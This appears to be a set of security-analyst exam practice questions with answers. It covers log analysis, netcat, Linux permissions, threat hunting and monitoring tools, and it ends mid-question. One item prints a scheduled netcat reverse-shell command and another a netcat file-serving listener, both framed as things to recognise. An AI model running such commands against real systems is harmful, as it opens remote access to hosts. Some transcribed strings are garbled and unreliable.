• Using a DNS blackhole and IP reputation list

Answer 112

Scanning all email using an antimalware tool

The most common solution to identifying malicious embedded links in email is to use an antimalware software package to scan all emails. They typically include tools that combine IP and domain reputation lists as well as other heuristic and analytical tools to help identify malicious and unwanted links.

Question 113

141- Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH?

• Add an iptables rule blocking root logins.
• Add root to the sudoers group.
• Change sshd_config to deny root login.
• Add a network IPS rule to block root logins.

Answer 113

Change sshd_config to deny root login.

Fortunately, the sshd service has a configuration setting called PermitRootLogin. Setting it to no will accomplish Singh’s goal.

Question 114

142- Azra’s network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command:

at \workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe

What does it do?

• It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30 p.m.
• It uses the AT command to dial a remote host via NetBIOS.
• It creates an HTTPS session to 10.1.2.3 every Friday at 8:30 p.m.
• It creates a VPN connection to 10.1.2.3 every five days at 8:30 p.m. GST.

Answer 114

It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30 p.m.

The at command can be used to schedule Windows tasks. This task starts netcat as a reverse shell using cmd.exe via port 443 every Friday at 8:30 p.m. local time. Azra should be concerned, as this allows traffic in that otherwise might be blocked.

Question 115

143- While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:

Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6> 3
Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]

Which of the following has not occurred?

• A user has attempted to reauthenticate too many times.
• PAM is configured for three retries and will reject any additional retries in the same session.
• Fail2ban has blocked the SSH login attempts.
• Root is attempting to log in via SSH from the local host.

Answer 115

Fail2ban has blocked the SSH login attempts.

This output shows a brute‐force attack run against the localhost’s root account using SSH. This resulted in the root user attempting to reauthenticate too many times, and PAM has blocked the retries. Fail2ban is not set up for this service; thus, this is the one item that has not occurred. If it was enabled, the Fail2ban log would read something like 2019-07-11 12:00:00,111 fail2ban.actions: WARNING [ssh] Ban 127.0.0.1.

Question 116

145- While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command:

nc -l -p 43501 ˂ example.zip

What happened?

• The user set up a reverse shell running as example.zip.
• The user set up netcat as a listener to push example.zip.
• The user set up a remote shell running as example.zip.
• The user set up netcat to receive example.zip.

Answer 116

The user set up netcat as a listener to push example.zip.

The -l flag is a key hint here, indicating that netcat was set up as a listener. Any connection to port 43501 will result in example.zip being sent to the connecting application. Typically, a malicious user would then connect to that port using netcat from a remote system to download the file.

Question 117

147- Lukas wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Lukas accomplish this for Windows workstations?

• Using application allowlisting to prevent all prohibited programs from running.
• Using Windows Defender and adding the game to the blocklist file.
• Listing it in the Blocked Programs list via secpol.msc.
• You cannot blocklist applications in Windows 10 without a third‐party application.

Answer 117

Using application allowlisting to prevent all prohibited programs from running.

Windows supports application allowlisting (whitelisting). Lukas can allowlist his allowed programs and then set the default mode to Disallowed, preventing all other applications from running and thus blocking the application. This can be a bit of a maintenance hassle but can be useful for high‐security environments, or those in which limiting what programs can run is critical.

Question 118

148- Ian lists the permissions for a Linux file that he believes may have been modified by an attacker. What do the permissions shown here mean?

-rwxrw-r&-1 chuck admingroup 1232 Feb 28 16:22 myfile.txt

• User chuck has read and write rights to the file; the Administrators group has read, write, and execute rights; and all other users only have read rights.
• User admingroup has read rights; group chuck has read and write rights; and all users on the system can read, write, and execute the file.
• User chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.
• User admingroup has read, write, and execute rights on the file; user chuck has read and write rights; and all other users have read rights to the file.

Answer 118

User chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.

Remember that rights are read from left to right as user rights, group rights, and then world rights. Here we have read, write, and execute (rwx) for chuck, rw for admingroup, and r for world.

Question 119

Linux Permissions

Answer 119

• position 1: type (e.g.: d for directory; - for file; l for symbolic link, etc..)
• postion 2-4: owner permission
• position 5-7: group permission
• position 8-10: others/world permission
• special characters: s, for SUID, t for sticky bit, etc..

Example:
-rwsr-xr-x 1 root root 50000 Aug 5 18:23 passwd

Reading the permissions, character by character:

• (Position 1): This is a regular file (not a directory or link)
• Owner permissions (Positions 2-4):

r: The owner (root) can read this file
w: The owner can write to/modify this file
s: This is the SUID bit + execute permission. It means when a regular user runs this program, it runs with the permissions of the file owner (root)

• Group permissions (Positions 5-7):

r: Users in the group (root) can read this file
-: Users in the group cannot write to this file
x: Users in the group can execute this file

• Others/World permissions (Positions 8-10):

r: All other users can read this file
-: Other users cannot write to this file
x: Other users can execute this file

• In numeric form, this would be represented as 4755:

4 for the special SUID bit
7 (4+2+1) for owner permissions (read+write+execute)
5 (4+0+1) for group permissions (read+execute)
5 (4+0+1) for others permissions (read+execute)

This permission set allows any user to run the passwd command to change their password, while the SUID bit ensures the program runs with root privileges (which are needed to update the password file).

Question 120

149- While reviewing web server logs, Danielle notices the following entry. What occurred?

10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200

• A theme was changed.
• A file was not found.
• An attempt to edit the 404 page.
• The 404 page was displayed.

Answer 120

An attempt to edit the 404 page.

Attackers often use built‐in editing tools that are inadvertently or purposefully exposed to edit files to inject malicious code. In this case, someone has attempted to modify the 404 file displayed by WordPress. Anybody who received a 404 error from this installation could have been exposed to malicious code inserted into the 404 page or simply a defaced 404 page.

Question 121

UEBA

Answer 121

User entity behavior analytics (UEBA) tools focus on behaviors rather than on a broad set of organizational data

Question 122

MDR

Answer 122

managed detection response (MDR) systems are used to speed up detection, rather than for compliance and orchestration.

Question 123

151- While reviewing the Wireshark packet capture, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address in question, if he investigates it in person?

• An encrypted RAT
• A VPN application
• A secure web browser
• A base64‐encoded packet transfer utility

Answer 123

A VPN application

Encapsulating Security Payload (ESP) packets are part of the IPsec protocol suite and are typically associated with a tunnel or VPN. Ryan should check for a VPN application and determine what service or system the user may have connected to.

Question 124

153- How does data enrichment differ from threat feed combination?

• Data enrichment is a form of threat feed combination for security insights, focuses on adding more threat feeds together for a full picture, and removes third‐party data to focus on core data elements rather than adding together multiple data sources.
• Data enrichment uses events and nonevent information to improve security insights, instead of just combining threat information.
• Threat feed combination is more useful than data enrichment because of its focus on only the threats.
• Threat feed combination techniques are mature, and data enrichment is not ready for enterprise use.

Answer 124

Data enrichment uses events and nonevent information to improve security insights, instead of just combining threat information.

Data enrichment combines data from multiple sources such as directories, geolocation information, and other data sources as well as threat feeds to provide deeper and broader security insights. It is not just a form of threat feed combination, and threat feed combination is a narrower technique than data enrichment is.

Question 125

155- Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?

• Use sha1sum to generate a hash for the file and write a script to check it periodically.
• Install and use Tripwire.
• Periodically check the MAC information for the file using a script.
• Encrypt the file and keep the key secret so the file cannot be modified.

Answer 125

Install and use Tripwire.

Tripwire and similar programs are designed to monitor files for changes and to report on changes that occur. They rely on file fingerprints (hashes) and are designed to be reliable and scalable. Kathleen’s best bet is to use a tool designed for the job, rather than to try to write her own.

Question 126

156- Alaina has configured her SOAR system to detect irregularities in geographical information for logins to her organization’s administrative systems. The system alarms, noting that an administrator has logged in from a location that they do not typically log in from. What other information would be most useful to correlate with this to determine if the login is a threat?

• Anomalies in privileged account usage
• Time‐based login information
• A mobile device profile change
• DNS request anomalies

Answer 126

Anomalies in privileged account usage

In this case, if the user is logged in to administrative systems, privileged account usage would be the most useful additional detail that Alaina could have available. Time‐based login information might also prove useful, but a traveling administrative user might simply be in another time zone. Mobile device profile changes and DNS request anomalies are less likely to be correlated with a remote exploit and more likely to be correlated with a compromise of a user device or malware respectively. Rank Software provides a great threat hunting playbook at www.osintme.com/wp‐content/uploads/2022/09/Threat_Hunting_Playbook.pdf that may prove useful to you as you consider these threats.

Question 127

158- Fiona is considering a scenario in which components that her organization uses in its software that come from public GitHub repositories are Trojaned. What should she do first to form the basis of her proactive threat‐hunting effort?

• Search for examples of a similar scenario.
• Validate the software currently in use from the repositories.
• Form a hypothesis.
• Analyze the tools available for this type of attack.

Answer 127

Form a hypothesis.

Forming a hypothesis should be Fiona’s next step. Once she starts to consider a scenario, she needs to identify the target and likely adversary techniques and determine how she would verify the hypothesis.

Question 128

160- Micah wants to use the data he has collected to help with his threat‐hunting practice. What type of approach is best suited to using large volumes of log and analytical data?

• Hypothesis‐driven investigation
• Investigation based on indicators of compromise
• Investigation based on indications of attack
• AI/ML‐based investigation

Answer 128

AI/ML‐based investigation

Artificial intelligence (AI) and machine learning (ML) approaches are ideal for large volumes of log and analytical data. Manual processes like hypothesis‐driven investigations, or IOC‐ or IOA‐driven investigations, can take significant amounts of time when dealing with large volumes of data.

Question 129

162- As part of her threat‐hunting activities, Olivia bundles her critical assets into groups. Why would she choose to do this?

• To increase the complexity of analysis
• To leverage the similarity of threat profiles
• To mix sensitivity levels
• To provide a consistent baseline for threats

Answer 129

To leverage the similarity of threat profiles

Bundling critical assets into groups allows similar assets to be assessed together, leveraging the similarity of their threat profiles. This makes analysis less complex, rather than more complex. Assets should be grouped by similar sensitivity levels, rather than mixed. Threats are assessed against other threats for comparison purposes, and bundling assets will not provide a baseline for them.

Question 130

167- Syslog, APIs, email, STIX/TAXII, and database connections are all examples of what for a SOAR?

• IOCs
• Methods of data ingestion
• SCAP connections
• Attack vectors

Answer 130

Methods of data ingestion

SOAR systems offer many ways to ingest data, and syslog, APIs, email, STIX/TAXII feeds, and database connections are all common ways for data to be acquired.

Question 131

169- Mila is reviewing feed data from the MISP open‐source threat intelligence tool and sees the following entry:

“Unit 42 has discovered a new malware family we’ve named
“Reaver” with ties to attackers who use SunOrcal malware.
SunOrcal activity has been documented to at least 2013, and
based on metadata surrounding some of the C2s, may have been
active as early as 2010. The new family appears to have been in
the wild since late 2016 and to date we have only identified 10
unique samples, indicating it may be sparingly used. Reaver is
also somewhat unique in the fact that its final payload is in
the form of a Control panel item, or CPL file. To date, only
0.006% of all malware seen by Palo Alto Networks employs this
technique, indicating that it is in fact fairly rare.”, “Tag”:
[{“colour”: “#00223b”, “exportable”: true, “name”:
“osint:source-type="blog-post"”}], “disable_correlation”:
false, “object_relation”: null, “type”: “comment”}, {“comment”:
“”, “category”: “Persistence mechanism”, “uuid”: “5a0a9d47-
1c7c-4353-8523-440b950d210f”, “timestamp”: “1510922426”,
“to_ids”: false, “value”: “%COMMONPROGRAMFILES%\services\”,
“disable_correlation”: false, “object_relation”: null, “type”:
“regkey”}, {“comment”: “”, “category”: “Persistence mechanism”,
“uuid”: “5a0a9d47-808c-4833-b739-43bf950d210f”, “timestamp”:
“1510922426”, “to_ids”: false, “value”:
“%APPDATA%\microsoft\mmc\”, “disable_correlation”: false,
“object_relation”: null, “type”: “regkey”}, {“comment”: “”,
“category”: “Persistence mechanism”, “uuid”: “5a0a9d47-91e0-
4fea-8a8d-48ce950d210f”, “timestamp”: “1510922426”, “to_ids”:
false, “value”:
“HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer
Shell Folders\Common Startup”
How does the Reaver malware maintain persistence?

• A blog post
• Inserts itself into the Registry
• Installs itself as a runonce key
• Requests user permission to start up

Answer 131

Inserts itself into the Registry

The question’s description includes details about the use of the startup Registry entry for Common Startup and lists a Registry key. This means the Reaver malware as described maintains persistence by using a Registry key.

Question 132

170- Isaac’s organization has deployed a security tool that learns how network users typically behave and then searches for differences that match attack behaviors. What type of system can automatically analyze this data to build detection capability like this?

• Signature‐based analysis
• A Babbage machine
• Machine learning
• Artificial network analysis

Answer 132

Machine learning

Machine learning (ML) in systems like this relies on datasets to build profiles of behavior that it then uses to identify abnormal behavior. They also use behavioral data that is frequently associated with attacks and malware and use that to compare to the user behavior patterns. Signature‐based analysis uses hashing or other related techniques to verify if files match a known malware package. The Babbage machine is a mechanical computer, and artificial network analysis was made up for this question.

Question 133

171- What is the advantage of a SOAR system over a traditional SIEM system?

• SOAR systems are less complex to manage.
• SOAR systems handle large log volumes better using machine learning.
• SOAR systems integrate a wider range of internal and external systems.
• SOAR logs are transmitted only over secure protocols.

Answer 133

SOAR systems integrate a wider range of internal and external systems.

Although SIEM and SOAR systems often have similar functionality, SOAR systems are typically designed to work with a broader range of internal and external systems, including threat intelligence feeds and other data sources, and then assist with the automation of responses.

Question 134

172- Fiona has continued her threat‐hunting efforts and has formed a number of hypotheses. What key issue should she consider when she reviews them?

• The number of hypotheses
• Her own natural biases
• Whether they are strategic or operational
• If the attackers know about them

Answer 134

Her own natural biases

A single analyst working alone is likely to have limitation to their knowledge, experience, and their own experiential biases. Thus, Fiona should review her hypotheses for her own natural biases and may want to involve other analysts or experts to help control for them.

Question 135

173- Nathan wants to determine which systems are sending the most traffic on his network. What low‐overhead data‐gathering methodology can he use to view traffic sources, destinations, and quantities?

• A network sniffer to view all traffic
• Implementing NetFlow
• Implementing SDWAN
• Implementing a network tap

Answer 135

Implementing NetFlow

A NetFlow or sFlow implementation can provide Nathan with the data he needs. Flows show the source, destination, type of traffic, and amount of traffic, and if he collects flow information from the correct locations on his network, he will have the ability to see which systems are sending the most traffic and will also have a general idea of what the traffic is. A sniffer requires more resources, whereas SDWAN is a software‐defined wide area network, which might provide some visibility but does not necessarily meet his needs. Finally, a network tap is used to capture data, but a tap alone does not analyze or provide this information.

Question 136

NetFlow

Answer 136

NetFlow is a Cisco network protocol that collects IP traffic information, which allows for network traffic monitoring. A typical flow capture includes the IP and port source and destination for the traffic and the class of service, which helps identify service problems and baseline typical network behavior and can also be useful in identifying unexpected behaviors

Question 137

175- Annie is reviewing a packet capture that she believes includes the download of malware. What host should she investigate further as the source of the malware based on the activity shown in the following image from her packet analysis efforts?

The image shows a network packet capture or traffic analysis log with multiple columns. Here’s the transcription:

No. | Time | Source | Destination | Protocol | Length | Info
-----|----------|--------------|-----------------|----------|--------|----------------------------------------------------
1332 | 75.818300 | 172.17.8.8 | 172.17.8.174 | DNS | 88 | Standard query response 0x5b71 A blueflag.xyz A 49.51.172.56
1333 | 75.824177 | 172.17.8.174 | 49.51.172.56 | TCP | 66 | 49731 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
1334 | 75.927162 | 172.17.8.174 | 172.17.8.8 | DNS | 81 | Standard query 0x79ec A wpad.one-hot-mess.com
1335 | 75.927488 | 172.17.8.8 | 172.17.8.174 | DNS | 160 | Standard query response 0x79ec No such name A wpad.one-hot-mess.com SOA one-hot-mess-dc.one-hot-mess.com
1336 | 75.927933 | 172.17.8.174 | 172.17.8.8 | DNS | 76 | Standard query 0x5aaa A wpad.localdomain
1337 | 75.928152 | 172.17.8.8 | 172.17.8.174 | DNS | 151 | Standard query response 0x5aaa No such name A wpad.localdomain SOA a.root-servers.net
1338 | 76.073948 | 49.51.172.56 | 172.17.8.174 | TCP | 58 | 80 → 49731 [SYN, ACK] Seq=1 Ack=1 Win=64240 Len=0 MSS=1460
1339 | 76.073962 | 172.17.8.174 | 49.51.172.56 | TCP | 54 | 49731 → 80 [ACK] Seq=1 Ack=1 Win=64240 Len=0
1340 | 76.074274 | 172.17.8.174 | 49.51.172.56 | HTTP | 232 | GET /ncvQQQHC8jZftiJvyvGA/yrkbdmt.bin HTTP/1.1
1341 | 76.074421 | 49.51.172.56 | 172.17.8.174 | TCP | 54 | 80 → 49731 [ACK] Seq=1 Ack=179 Win=64240 Len=0
1342 | 76.410999 | 49.51.172.56 | 172.17.8.174 | TCP | 1202 | 80 → 49731 [PSH, ACK] Seq=1 Ack=179 Win=64240 Len=1228 [TCP segment of a reassembled PDU]
1343 | 76.411109 | 49.51.172.56 | 172.17.8.174 | TCP | 1514 | 80 → 49731 [ACK] Seq=1229 Ack=179 Win=64240 Len=1460 [TCP segment of a reassembled PDU]
1344 | 76.411127 | 49.51.172.56 | 172.17.8.174 | TCP | 1050 | 80 → 49731 [PSH, ACK] Seq=2689 Ack=179 Win=64240 Len=996 [TCP segment of a reassembled PDU]
1345 | 76.411564 | 172.17.8.174 | 49.51.172.56 | TCP | 54 | 49731 → 80 [ACK] Seq=179 Ack=3685 Win=60224 Len=0
1346 | 76.415378 | 49.51.172.56 | 172.17.8.174 | TCP | 1282 | 80 → 49731 [PSH, ACK] Seq=3685 Ack=179 Win=64240 Len=1228 [TCP segment of a reassembled PDU]
1347 | 76.415864 | 172.17.8.174 | 49.51.172.56 | TCP | 54 | 49731 → 80 [ACK] Seq=179 Ack=4913 Win=63012 Len=0
1348 | 76.422802 | 49.51.172.56 | 172.17.8.174 | TCP | 1514 | 80 → 49731 [ACK] Seq=4913 Ack=179 Win=64240 Len=1460 [TCP segment of a reassembled PDU]
1349 | 76.422843 | 49.51.172.56 | 172.17.8.174 | TCP | 1050 | 80 → 49731 [PSH, ACK] Seq=6373 Ack=179 Win=64240 Len=996 [TCP segment of a reassembled PDU]
1350 | 76.423086 | 172.17.8.174 | 49.51.172.56 | TCP | 54 | 49731 → 80 [ACK] Seq=179 Ack=7369 Win=64240 Len=0
1351 | 76.427437 | 49.51.172.56 | 172.17.8.174 | TCP | 1514 | 80 → 49731 [ACK] Seq=7369 Ack=179 Win=64240 Len=1460 [TCP segment of a reassembled PDU]
1352 | 76.427453 | 49.51.172.56 | 172.17.8.174 | TCP | 1050 | 80 → 49731 [PSH, ACK] Seq=8829 Ack=179 Win=64240 Len=996 [TCP segment of a reassembled PDU]
1353 | 76.427822 | 172.17.8.174 | 49.51.172.56 | TCP | 54 | 49731 → 80 [ACK] Seq=179 Ack=9825 Win=64240 Len=0
1354 | 76.434833 | 49.51.172.56 | 172.17.8.174 | TCP | 1514 | 80 → 49731 [ACK] Seq=9825 Ack=179 Win=64240 Len=1460 [TCP segment of a reassembled PDU]

This appears to be a Wireshark or similar packet capture showing network traffic, including DNS queries, TCP connections, and an HTTP request. The traffic shows communication between hosts 172.17.8.174, 172.17.8.8, and 49.51.172.56, with various protocols including DNS, TCP, and HTTP.

• 172.17.8.8
• 49.51.172.56
• 172.17.8.172
• 56.172.51.49

Answer 137

49.51.172.56

A binary file is downloaded from 49.51.172.56, as shown by the GET command for nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin. Annie should mark this as an indicator of compromise (IoC) and look for other traffic to or from this host, as well as what the workstation or system it is downloaded to does next.

Question 138

176- Steve uploads a malware sample to an analysis tool and receives the following messages:

> Executable file was dropped: C:\Logs\mffcae1.exe
Child process was created, parent C:\Windows\system32\cmd.exe
mffcae1.exe connects to unusual port
File downloaded: cx99.exe
If he wanted to observe the download behavior himself, what is the best tool to capture detailed information about what occurs?

• An antimalware tool
• Wireshark
• An IPS
• Network flows

Answer 138

Wireshark

Steve could use Wireshark to capture the download traffic and to observe what host the file was downloaded from. Antimalware tools typically remove the malware but do not provide detailed visibility into its actions. An IPS can detect attacks but would need specific rules to detect the actions taken. Network flows will show where the traffic went but will not provide detailed specifics like a packet capture tool would.

Question 139

177- Abdul is analyzing proxy logs from servers that run in his organization and notices two proxy log servers have entries for similar activities that always occur one hour apart from each other. Both proxy servers are in the same datacenter, and the activity is part of a normal evening process that runs at 7 p.m. One proxy server records the data at 7 p.m., and one records the entry at 6 p.m. What issue has Abdul likely encountered?

• A malware infection emulating a legitimate process
• An incorrect time zone setting
• A flaw in the automation script
• A log entry error

Answer 139

An incorrect time zone setting

A relatively common issue during log reviews is incorrect or mismatched time zone settings. Many organizations that operate in more than one time zone use Universal Time Coordinated (UTC) to avoid having to do time zone corrections when comparing logs. In this case, Abdul should check the server that is recording the events at 6 p.m. to see if it is set to the wrong time zone or otherwise is misconfigured to have the wrong system time.

Question 140

ingress vs egress

Answer 140

Ingress refers to something entering a system or network, while egress refers to something exiting a system or network.

Question 141

178- What do DLP systems use to classify data and to ensure that it remains protected?

• Data signatures
• Business rules
• Data egress filters
• Data at rest

Answer 141

Business rules

Data loss prevention (DLP) systems use business rules that define when and how data is allowed to move around an organization, as well as how it should be classified. Data at rest is data that is not moving, and the remaining options were made up for this question.

Question 142

181- Eric wants to analyze a malware binary in the safest way possible. Which of the following methods has the least likelihood of allowing the malware to cause problems?

• Running the malware on an isolated VM
• Performing dynamic analysis of the malware in a sandbox
• Performing static analysis of the malware
• Running the malware in a container service

Answer 142

Performing static analysis of the malware

Although you can build an isolated sandbox or VM, the safest way to analyze malware is to analyze the source code rather than running it. Thus, static analysis is the safest answer, but it may not be as useful as dynamic analysis where you can capture what the malware does as it happens. Static analysis can also be significantly slower because of the effort required to disassemble the code and reverse‐engineer what it is doing.

Question 143

182- Tom wants to improve his detection capabilities for his software‐as‐a‐service (SaaS) environment. What technology is best suited to give him a view of usage, data flows, and other details for cloud environments?

• EDR
• CASB
• IDS
• SIEM

Answer 143

CASB

A cloud access security broker (CASB) is the ideal tool to increase Tom’s visibility into cloud services. CASB tools are specifically designed to monitor for cloud access patterns and to ensure that unwanted activity does not occur.

Question 144

183- Juan wants to audit filesystem activity in Windows and configures Windows filesystem auditing. What setting can he set to know if a file was changed or not using Windows file auditing?

• Set Detect Change
• Set Validate File Versions
• Set Audit Modifications
• None of the above

Answer 144

None of the above

Windows filesystem auditing does not provide the ability to detect if files were changed. Forensic artifacts can indicate that a file was opened and identify the program that opened it. However, unlike tools such as Tripwire that track file hashes and thus can identify modifications, Windows file auditing cannot provide this detail.

Question 145

184- Naomi wants to analyze URLs found in her passive DNS monitoring logs to find domain generation algorithm (DGA)–generated command‐and‐control links. What techniques are most likely to be useful for this?

• WHOIS lookups and NXDOMAIN queries of suspect URLs
• Querying URL allowlists
• DNS probes of command‐and‐control networks
• Natural language analysis of domain names

Answer 145

WHOIS lookups and NXDOMAIN queries of suspect URLs

URL analysis of domain generation algorithm–created uniform resource locators (URLs) relies on either testing URLs via WHOIS lookups and NXDOMAIN responses or using machine learning (ML) techniques, which recognize patterns common to DGA‐generated URLs. Natural language processing focuses on understanding natural language data, but DGAs do not rely on natural language–style URLs in most cases.

Question 146

DGA

Answer 146

A domain generation algorithm (DGA) is a technique used by malicious actors, often in malware, that generates domain names algorithmically.
Here are some key aspects of DGAs:

• Malware may use DGAs to create numerous, seemingly random domain names to use for command-and-control (C&C) communication.
• The rapidly changing domain names associated with DGAs make it more difficult to block the communication, because even if some hosts are taken down, the malware can rotate to new names.
• Detecting DGA-created URLs often relies on testing URLs via WHOIS lookups and Non-Existent Domain (NXDOMAIN) responses or using machine learning techniques that recognize patterns common to DGA-generated URLs

Question 147

186- Lucca is reviewing bash command history logs on a system that he suspects may have been used as part of a breach. He discovers the following grep command run inside of the /users directory by an administrative user. What will the command find?

Grep -r “sudo” /home/users/ | grep “bash.log”

• All occurrences of the sudo command on the system
• All occurrences of root logins by users
• All occurrences of the sudo command in bash log files in user home directories
• All lines that do not contain the word sudo or bash.log in user directories

Answer 147

All occurrences of the sudo command in bash log files in user home directories

In this scenario, the attacker may have been trying to find users who have typed credentials into a sudo command in a script. This will find all occurrences of the sudo command in all the /home/users subdirectories and will then feed that output to a search for bash.log, meaning that only occurrences of sudo inside of bash.log entries will be returned.

Question 148

187- Cynthia wants to build scripts to detect malware beaconing behavior. Which of the following is not a typical means of identifying malware beaconing behavior on a network?

• Persistence of the beaconing
• Beacon protocol
• Beaconing interval
• Removal of known traffic

Answer 148

Beacon protocol

Unless she already knows the protocol that a particular beacon uses, filtering out beacons by protocol may cause her to miss beaconing behavior. Attackers want to dodge common analytical tools and will use protocols that are less likely to attract attention. Filtering network traffic for beacons based on the intervals and frequency they are sent at, if the beacon persists over time, and removing known traffic are common means of filtering traffic to identify beacons.

Question 149

188- Eric has access to a full suite of network monitoring tools and wants to use appropriate tools to monitor network bandwidth consumption. Which of the following is not a common method of monitoring network bandwidth usage?

• SNMP
• Portmon
• Packet sniffing
• NetFlow

Answer 149

Portmon

SNMP, packet sniffing, and NetFlow are commonly used when monitoring bandwidth consumption. Portmon is an aging Windows tool used to monitor serial and parallel ports, not exactly the sort of tool you’d use to watch your network’s bandwidth usage!

Question 150

217- Brendan is reviewing a series of syslog entries and notices several with different logging levels. Which one of the following messages should he review first?

• Level 0
• Level 1
• Level 5
• Level 7

Answer 150

Level 0

Syslog levels identify the urgency of the message and are numbered from 0 through 7. The highest level is level 0, which is designated as an emergency message. Syslog level 1 messages are alerts, level 2 messages are critical messages, level 3 messages are errors, level 4 messages are warnings, level 5 messages are notices, level 6 messages are informational, and level 7 is for debugging messages.

Question 151

193- Angela wants to use her network security device to detect potential beaconing behavior. Which of the following options is best suited to detecting beaconing using her network security device?

• Antivirus definitions
• File reputation
• IP reputation
• Static file analysis

Answer 151

IP reputation

Angela’s best choice would be to implement IP reputation to monitor for connections to known bad hosts. Antivirus definitions, file reputation, and static file analysis are all useful for detecting malware, but command‐and‐control traffic like beaconing will typically not match definitions, won’t send known files, and won’t expose files for analysis.

Question 152

194- A server in the datacenter that Chris is responsible for monitoring unexpectedly connects to an offsite IP address and transfers 9 GB of data to the remote system. What type of monitoring should Chris enable to best assist him in detecting future events of this type?

• Flow logs with heuristic analysis
• SNMP monitoring with heuristic analysis
• Flow logs with signature‐based detection
• SNMP monitoring with signature‐based detection

Answer 152

Flow logs with heuristic analysis

Flow logs would show Chris outbound traffic flows based on remote IP addresses as well as volume of traffic, and behavioral (heuristic) analysis will help him to alert on similar behaviors. Chris should build an alert that alarms when servers in his datacenter connect to domains that are not already allowlisted and should strongly consider whether servers should be allowed to initiate outbound connections at all.

Question 153

195- While reviewing his network for rogue devices, Dan notes that for three days a system with MAC address D4:BE:D9:E5:F9:18 has been connected to a switch in one of the offices in his building. What information can this provide Dan that may be helpful if he conducts a physical survey of the office?

• The operating system of the device
• The user of the system
• The vendor that built the system
• The type of device that is connected

Answer 153

The vendor that built the system

Dan can look up the manufacturer prefix that makes up the first part of the MAC address. In this case, Dan will discover that the system is likely a Dell, potentially making it easier for him to find the machine in the office. Network management and monitoring tools build in this identification capability, making it easier to see if unexpected devices show up on the network. Of course, if the local switch is a managed switch, he can also query it to determine what port the device is plugged into and follow the network cable to it.

Question 154

196- While checking for bandwidth consumption issues, Bohai uses the ifconfig command on the Linux box that he is reviewing. He sees that the device has sent less than 4 GB of data, but his network flow logs show that the system has sent more than 20 GB. What problem has Bohai encountered?

• A rootkit is concealing traffic from the Linux kernel.
• Flow logs show traffic that does not reach the system.
• ifconfig resets traffic counters at 4 GB.
• ifconfig only samples outbound traffic and will not provide accurate information.

Answer 154

ifconfig resets traffic counters at 4 GB.

The traffic values captured by ifconfig reset at 4 GB of data, making it an unreliable means of assessing how much traffic a system has sent when dealing with large volumes of traffic. Bohai should use an alternate tool designed specifically to monitor traffic levels to assess the system’s bandwidth usage.

Question 155

197- Vlad believes that an attacker may have added accounts and attempted to obtain extra rights on a Linux workstation. Which of the following is not a common way to check for unexpected accounts like this?

• Review /etc/passwd and /etc/shadow for unexpected accounts.
• Check /home/ for new user directories.
• Review /etc/sudoers for unexpected accounts.
• Check /etc/groups for group membership issues.

Answer 155

Check /home/ for new user directories.

It is unlikely that skilled attackers will create a new home directory for an account they want to hide. Checking /etc/password and /etc/shadow for new accounts is a quick way to detect unexpected accounts, and checking both the sudoers and membership in wheel and other high‐privilege groups can help Vlad detect unexpected accounts with increased privileges.

Question 156

198- Ben wants to coordinate with other organizations in the information security community to share data and current events as well as warnings of new security issues. What type of organization should he join?

• An ISAC
• A CSIRT
• A VPAC
• An IRT

Answer 156

An ISAC

Information sharing and analysis centers (ISACs) are information sharing and community support organizations that work within vertical industries such as energy, higher education, and other business domains. Ben may choose to have his organization join an ISAC to share and obtain information about threats and activities that are particularly relevant to what his organization does. A CSIRT is a computer security incident response team and tends to be hosted in a single organization, a VPAC is made up, and an IRT is an incident response team.

Question 157

199- While investigating a spam email, Adam is able to capture headers from one of the email messages that was received. He notes that the sender was Carmen Victoria Garci. What facts can he gather from the headers shown here?

ARC-Authentication-Results: i=1; mx.google.com;
spf=pass (google.com: domain of www.fccrea.ccn.ne.jp designates 153.149.233.2 as permitted sender) smtp.mailfromwww.fccrea.ccn.ne.jp
Return-Path: <www.fccrea.ccn.ne.jp>
Received: from mb4d0201.ccn.ad.jp (mb4d0201.ccn.ad.jp. [153.149.233.2])
by mx.google.com with ESMTP id d13zs157t0e64pln.176.2017.07.04.09.33.08;
Tue, 04 Jul 2017 09:33:08 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1499181188; cv=none;
d=google.com; s=arc-20160816;
b=O3BXkFLl1P6JBZ26tEjQbZ8EZlqo3xRs06J7svBcGvfbI1nIrYBZcowmww.fccrea.ccn.ne.jp
Authentication-Results: mx.google.com;
spf=pass (google.com: domain of www.fccrea.ccn.ne.jp designates 153.149.233.2 as permitted sender) smtp.mailfromwww.fccrea.ccn.ne.jp
Received: from mf-smf-uob01l.ccn.ad.jp (mf-smf-uob01l.ccn.ad.jp [153.149.233.226]) by mb4d0201.ccn.ad.jp (Postfix) with ESMTP id DEFE8A00057; Wed,
5 Jul 2017 01:33:05 +0900 (JST)
